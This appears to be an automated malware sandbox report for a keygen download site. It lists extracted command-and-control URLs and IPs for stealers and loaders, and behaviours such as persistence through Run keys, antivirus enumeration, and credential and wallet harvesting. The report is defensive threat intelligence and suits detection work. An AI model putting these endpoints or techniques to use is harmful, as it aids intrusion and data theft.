Resubmissions
28-03-2021 14:03
210328-k4cvgmxem6 1028-03-2021 09:38
210328-av8mak971a 1027-03-2021 18:19
210327-4yh3gn24dn 10Analysis
-
max time kernel
328s -
max time network
1800s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
28-03-2021 14:03
Static task
static1
URLScan task
urlscan1
Sample
https://keygenninja.com/
Behavioral task
behavioral1
Sample
https://keygenninja.com/
Resource
win10v20201028
Behavioral task
behavioral2
Sample
https://keygenninja.com/
Resource
win10v20201028
Behavioral task
behavioral3
Sample
https://keygenninja.com/
Resource
win10v20201028
General
-
Target
https://keygenninja.com/
Malware Config
Extracted
raccoon
4ce8ad65ffaa0dffa8cc56e03b4fd65c31c1a91d
-
url4cnc
https://telete.in/j90dadarobin
Extracted
metasploit
windows/single_exec
Extracted
redline
newserver2
91.214.124.106:80
Extracted
icedid
1218613048
shturmann.space
Extracted
smokeloader
2020
http://xsss99.icu/upload/
http://bingooodsg.icu/upload/
http://junntd.xyz/upload/
http://ginessa11.xyz/upload/
http://overplayninsx.xyz/upload/
http://bananinze.com/upload/
http://daunimlas.com/upload/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral3/memory/6928-611-0x0000000002370000-0x0000000002C7A000-memory.dmp family_glupteba behavioral3/memory/6928-614-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral3/memory/6928-615-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/7088-640-0x0000000000400000-0x0000000000432000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 5496 created 2908 5496 WerFault.exe ujrfw5dzs5t.exe PID 2132 created 6028 2132 WerFault.exe winhost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 7268 created 4548 7268 svchost.exe 1s3e04nqvcn.exe PID 7268 created 6928 7268 svchost.exe app.exe -
Taurus Stealer Payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/8148-1543-0x0000000000400000-0x0000000000437000-memory.dmp family_taurus_stealer behavioral3/memory/8148-1542-0x0000000002420000-0x0000000002456000-memory.dmp family_taurus_stealer -
fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
IcedID First Stage Loader 1 IoCs
Processes:
resource yara_rule behavioral3/memory/5280-776-0x0000000001130000-0x0000000001137000-memory.dmp IcedidFirstLoader -
XMRig Miner Payload 4 IoCs
Processes:
resource yara_rule behavioral3/memory/6404-594-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6404-604-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6404-664-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/9244-1608-0x0000000000C00000-0x0000000000CF1000-memory.dmp xmrig -
Blocklisted process makes network request 43 IoCs
Processes:
cmd.execmd.execmd.exemsiexec.exeMsiExec.exeflow pid process 27 2400 cmd.exe 16 2400 cmd.exe 17 2400 cmd.exe 18 2400 cmd.exe 23 2400 cmd.exe 21 2400 cmd.exe 108 2400 cmd.exe 25 2400 cmd.exe 47 2400 cmd.exe 82 2400 cmd.exe 33 2400 cmd.exe 35 2400 cmd.exe 43 2400 cmd.exe 48 2400 cmd.exe 49 2400 cmd.exe 62 2400 cmd.exe 87 2400 cmd.exe 71 2400 cmd.exe 77 2400 cmd.exe 86 2400 cmd.exe 98 2400 cmd.exe 88 2400 cmd.exe 310 5728 cmd.exe 316 5728 cmd.exe 318 5728 cmd.exe 319 5728 cmd.exe 324 4464 cmd.exe 330 6404 msiexec.exe 373 5876 MsiExec.exe 377 5876 MsiExec.exe 385 5876 MsiExec.exe 389 5876 MsiExec.exe 392 5876 MsiExec.exe 389 5876 MsiExec.exe 389 5876 MsiExec.exe 330 6404 msiexec.exe 373 5876 MsiExec.exe 373 5876 MsiExec.exe 377 5876 MsiExec.exe 377 5876 MsiExec.exe 392 5876 MsiExec.exe 392 5876 MsiExec.exe 385 5876 MsiExec.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 5 IoCs
Processes:
ppppppfy.exeMicrosoft.exeDrvInst.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts ppppppfy.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Microsoft.exe File opened for modification C:\Windows\System32\drivers\SET743D.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET743D.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 64 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exekey.exemultitimer.exesetups.exeaskinstall20.exesetups.tmpA430.tmp.exekeygen-step-2.exemultitimer.exemultitimer.exe5snr5w1i4po.exe5snr5w1i4po.tmpSetup3310.exeSetup3310.tmpujrfw5dzs5t.exevict.exeAwesomePoolU1.exevict.tmpvpn.exevpn.tmpIBInstaller_97039.exeIBInstaller_97039.tmp1s3e04nqvcn.exeapp.exechrome_proxy.exedlhyb25fezb.exewinlthsth.exefile.exewinhost.exeSetup.execustomer5.exehjjgaa.exeRunWW.exejg7_7wjg.exeLabPicV3.exelylal220.exeRmSetp.exe22.exeUgEwD2Otfx9I.exeLabPicV3.tmplylal220.tmpcmd.exejfiag3g_gg.exemd2_2efs.exe7za.exemain.exe7za.exe7256975.exe5000800.exeppppppfy.exeMicrosoft.exejfiag3g_gg.exeapp.exeWindows Host.exe1s3e04nqvcn.exetapinstall.exeirecord.exeSHyxopikyro.exepid process 3916 keygen-pr.exe 4988 keygen-step-1.exe 2156 keygen-step-2.exe 4484 keygen-step-3.exe 3652 keygen-step-4.exe 4924 key.exe 4500 Setup.exe 4568 key.exe 752 multitimer.exe 1672 setups.exe 640 askinstall20.exe 896 setups.tmp 4884 A430.tmp.exe 1924 keygen-step-2.exe 4384 multitimer.exe 4120 multitimer.exe 2868 5snr5w1i4po.exe 1580 5snr5w1i4po.tmp 1240 Setup3310.exe 3584 Setup3310.tmp 2908 ujrfw5dzs5t.exe 2904 vict.exe 2232 AwesomePoolU1.exe 1312 vict.tmp 4560 vpn.exe 3944 vpn.tmp 5096 IBInstaller_97039.exe 2984 IBInstaller_97039.tmp 3068 1s3e04nqvcn.exe 5188 app.exe 5264 chrome_proxy.exe 5272 dlhyb25fezb.exe 5396 winlthsth.exe 5680 file.exe 6028 winhost.exe 4708 Setup.exe 2408 customer5.exe 3248 hjjgaa.exe 4788 RunWW.exe 5304 jg7_7wjg.exe 4084 LabPicV3.exe 4280 lylal220.exe 2412 RmSetp.exe 5324 22.exe 4660 UgEwD2Otfx9I.exe 5184 LabPicV3.tmp 5756 lylal220.tmp 5728 cmd.exe 5416 jfiag3g_gg.exe 6408 md2_2efs.exe 6428 7za.exe 6344 main.exe 6600 7za.exe 6688 7256975.exe 6712 5000800.exe 6972 ppppppfy.exe 6984 Microsoft.exe 7156 jfiag3g_gg.exe 6928 app.exe 5168 Windows Host.exe 4548 1s3e04nqvcn.exe 7008 tapinstall.exe 3272 irecord.exe 5808 SHyxopikyro.exe -
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
SHyxopikyro.exeJolaheraby.exeWeather.exeWeather.exesetups.tmpcmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation SHyxopikyro.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation Jolaheraby.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation Weather.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation Weather.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 64 IoCs
Processes:
setups.tmpA430.tmp.exe5snr5w1i4po.tmpSetup3310.tmpvict.tmpvpn.tmpIBInstaller_97039.tmpdlhyb25fezb.exeapp.exeLabPicV3.tmplylal220.tmp1s3e04nqvcn.exemain.exeMsiExec.exeRunWW.exerundll32.exeMsiExec.exeregsvr32.exeregsvr32.exereg.exemain.exerundll32.exerundll32.exemask_svc.exeWeather_Installation.exepid process 896 setups.tmp 896 setups.tmp 896 setups.tmp 896 setups.tmp 896 setups.tmp 4884 A430.tmp.exe 4884 A430.tmp.exe 4884 A430.tmp.exe 4884 A430.tmp.exe 4884 A430.tmp.exe 1580 5snr5w1i4po.tmp 3584 Setup3310.tmp 3584 Setup3310.tmp 1312 vict.tmp 3944 vpn.tmp 3944 vpn.tmp 2984 IBInstaller_97039.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 3944 vpn.tmp 5272 dlhyb25fezb.exe 5188 app.exe 5184 LabPicV3.tmp 5756 lylal220.tmp 3068 1s3e04nqvcn.exe 6344 main.exe 6292 MsiExec.exe 4788 RunWW.exe 4788 RunWW.exe 6292 MsiExec.exe 6292 MsiExec.exe 6076 rundll32.exe 5876 MsiExec.exe 5876 MsiExec.exe 5876 MsiExec.exe 5876 MsiExec.exe 5876 MsiExec.exe 5876 MsiExec.exe 5876 MsiExec.exe 5876 MsiExec.exe 5876 MsiExec.exe 5876 MsiExec.exe 4804 regsvr32.exe 5280 regsvr32.exe 864 reg.exe 6680 main.exe 5288 rundll32.exe 4664 rundll32.exe 7848 mask_svc.exe 7848 mask_svc.exe 7848 mask_svc.exe 7848 mask_svc.exe 7848 mask_svc.exe 7848 mask_svc.exe 3944 vpn.tmp 3944 vpn.tmp 4852 Weather_Installation.exe 4852 Weather_Installation.exe 4852 Weather_Installation.exe 4852 Weather_Installation.exe 4852 Weather_Installation.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
aipackagechainer.exeWeather_Installation.execmd.exeMicrosoft.exeppppppfy.exemultitimer.exehjjgaa.exe5000800.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Weather_Installation.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Adobe\\Bujydapebae.exe\"" Microsoft.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Ritugomegy.exe\"" ppppppfy.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --anbfs" Weather_Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\w0o0e4vz5m2 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\WTKV8Z9VG9\\multitimer.exe\" 1 3.1616940310.60608d1673967" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 5000800.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
md2_2efs.exejg7_7wjg.execmd.exegaooo.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg7_7wjg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gaooo.exe -
Drops Chrome extension 1 IoCs
Processes:
askinstall20.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json askinstall20.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
dlhyb25fezb.exemsiexec.exedescription ioc process File opened (read-only) \??\P: dlhyb25fezb.exe File opened (read-only) \??\U: dlhyb25fezb.exe File opened (read-only) \??\Y: dlhyb25fezb.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: dlhyb25fezb.exe File opened (read-only) \??\M: dlhyb25fezb.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: dlhyb25fezb.exe File opened (read-only) \??\X: dlhyb25fezb.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: dlhyb25fezb.exe File opened (read-only) \??\T: dlhyb25fezb.exe File opened (read-only) \??\V: dlhyb25fezb.exe File opened (read-only) \??\W: dlhyb25fezb.exe File opened (read-only) \??\Z: dlhyb25fezb.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: dlhyb25fezb.exe File opened (read-only) \??\O: dlhyb25fezb.exe File opened (read-only) \??\Q: dlhyb25fezb.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: dlhyb25fezb.exe File opened (read-only) \??\S: dlhyb25fezb.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: dlhyb25fezb.exe File opened (read-only) \??\N: dlhyb25fezb.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\E: dlhyb25fezb.exe File opened (read-only) \??\I: dlhyb25fezb.exe File opened (read-only) \??\J: dlhyb25fezb.exe File opened (read-only) \??\K: dlhyb25fezb.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: dlhyb25fezb.exe File opened (read-only) \??\Y: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 25 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 788 api.2ip.ua 1166 api.2ip.ua 1783 checkip.amazonaws.com 1855 ip-api.com 285 ip-api.com 353 checkip.amazonaws.com 747 api.2ip.ua 792 ipinfo.io 1266 checkip.amazonaws.com 1908 api.2ip.ua 1913 api.2ip.ua 206 ipinfo.io 277 checkip.amazonaws.com 371 ip-api.com 508 checkip.amazonaws.com 651 checkip.amazonaws.com 694 ipinfo.io 1233 ipinfo.io 1815 ipinfo.io 1838 checkip.amazonaws.com 203 ipinfo.io 692 ipinfo.io 721 checkip.amazonaws.com 745 api.2ip.ua 1761 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in System32 directory 20 IoCs
Processes:
DrvInst.exeWerFault.exesvchost.exeDrvInst.exedescription ioc process File opened for modification C:\Windows\System32\DriverStore\Temp\{09dd5e28-89bc-7b4b-9186-7f47d0e95c6a}\SET718D.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{09dd5e28-89bc-7b4b-9186-7f47d0e95c6a}\SET718E.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{09dd5e28-89bc-7b4b-9186-7f47d0e95c6a}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{09dd5e28-89bc-7b4b-9186-7f47d0e95c6a}\SET718F.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{09dd5e28-89bc-7b4b-9186-7f47d0e95c6a}\SET718F.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF WerFault.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\CV38PM69.cookie svchost.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\CV38PM69.cookie svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{09dd5e28-89bc-7b4b-9186-7f47d0e95c6a}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{09dd5e28-89bc-7b4b-9186-7f47d0e95c6a}\SET718E.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{09dd5e28-89bc-7b4b-9186-7f47d0e95c6a}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{09dd5e28-89bc-7b4b-9186-7f47d0e95c6a} DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{09dd5e28-89bc-7b4b-9186-7f47d0e95c6a}\SET718D.tmp DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
Processes:
parse.exeparse.exe1s3e04nqvcn.exemask_svc.exemask_svc.exemask_svc.exepid process 6312 parse.exe 1288 parse.exe 2028 1s3e04nqvcn.exe 6312 parse.exe 2028 1s3e04nqvcn.exe 1288 parse.exe 7948 mask_svc.exe 1728 mask_svc.exe 7848 mask_svc.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
key.exekeygen-step-2.execmd.exesvchost.exeUgEwD2Otfx9I.exedescription pid process target process PID 4924 set thread context of 4568 4924 key.exe key.exe PID 2156 set thread context of 1924 2156 keygen-step-2.exe keygen-step-2.exe PID 5728 set thread context of 4932 5728 cmd.exe msiexec.exe PID 3264 set thread context of 4464 3264 svchost.exe cmd.exe PID 5728 set thread context of 6404 5728 cmd.exe msiexec.exe PID 4660 set thread context of 7088 4660 UgEwD2Otfx9I.exe AddInProcess32.exe PID 3264 set thread context of 1128 3264 svchost.exe svchost.exe -
Drops file in Program Files directory 64 IoCs
Processes:
IBInstaller_97039.tmpvpn.tmpprolab.tmp1s3e04nqvcn.exeirecord.tmpapp.exe7za.exeSetup.exe7za.exejg7_7wjg.exe19.exe22.exeMicrosoft.exedescription ioc process File opened for modification C:\Program Files (x86)\Install engine 16\getithelper260.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-5PC0R.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Picture Lab\SourceGrid2.dll prolab.tmp File created C:\Program Files (x86)\Late-Water\7zxa.dll 1s3e04nqvcn.exe File opened for modification C:\Program Files (x86)\I-record\AForge.Video.dll irecord.tmp File opened for modification C:\Program Files (x86)\I-record\swresample-0.dll irecord.tmp File opened for modification C:\Program Files (x86)\Wandering-Wildflower\winamp.7z app.exe File created C:\Program Files (x86)\Install engine 16\is-NTGAF.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\Install engine 16\is-TH7M7.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-CE5EI.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-ACKAE.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File created C:\Program Files (x86)\Late-Water\7za.dll 1s3e04nqvcn.exe File opened for modification C:\Program Files (x86)\Wandering-Wildflower\winamp.exe 7za.exe File created C:\Program Files (x86)\MaskVPN\is-CRE58.tmp vpn.tmp File created C:\Program Files (x86)\Install engine 16\is-ELR5G.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-PRP7T.tmp vpn.tmp File opened for modification C:\Program Files (x86)\VR\Versium Research\lylal220.exe Setup.exe File created C:\Program Files (x86)\VR\Versium Research\Uninstall.ini Setup.exe File created C:\Program Files (x86)\Wandering-Wildflower\7za.exe app.exe File created C:\Program Files (x86)\Late-Water\winamp.exe 7za.exe File created C:\Program Files (x86)\I-record\is-MO1HQ.tmp irecord.tmp File opened for modification C:\Program Files 